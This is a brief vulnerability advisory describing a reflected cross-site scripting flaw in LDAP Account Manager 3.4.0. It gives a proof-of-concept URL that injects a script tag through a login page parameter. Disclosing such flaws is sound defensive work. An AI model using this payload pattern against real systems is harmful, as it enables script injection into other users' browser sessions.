Home
Consulting
Advisories
Software
Articles
Contact

LDAP Account Manager 3.4.0 Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in LDAP Account Manager 3.4.0 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/ldap-account-manager-3.4.0/templates/login.php?selfserviceSaveOk=%3Cscript%3Ealert%280%29%3C/script%3E


Copyright © 2018 AutoSec Tools LLC